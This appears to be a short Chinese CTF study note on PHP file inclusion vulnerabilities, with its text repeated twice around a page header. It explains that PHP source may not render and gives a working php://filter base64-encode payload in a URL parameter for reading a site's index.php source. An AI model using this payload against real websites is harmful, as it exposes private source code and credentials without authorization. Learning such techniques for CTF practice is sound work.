(1)文件包含漏洞
原理:.php文件可能在前台显示不出来(php://filter过滤读取源代码,如URL:xxxx/index.php?file=show.php)
方法:先让文件转化为base64格式然后再输出
例:xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
CTF--文件包含
最新推荐文章于 2024-08-01 20:34:23 发布
(1)文件包含漏洞
原理:.php文件可能在前台显示不出来(php://filter过滤读取源代码,如URL:xxxx/index.php?file=show.php)
方法:先让文件转化为base64格式然后再输出
例:xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=index.php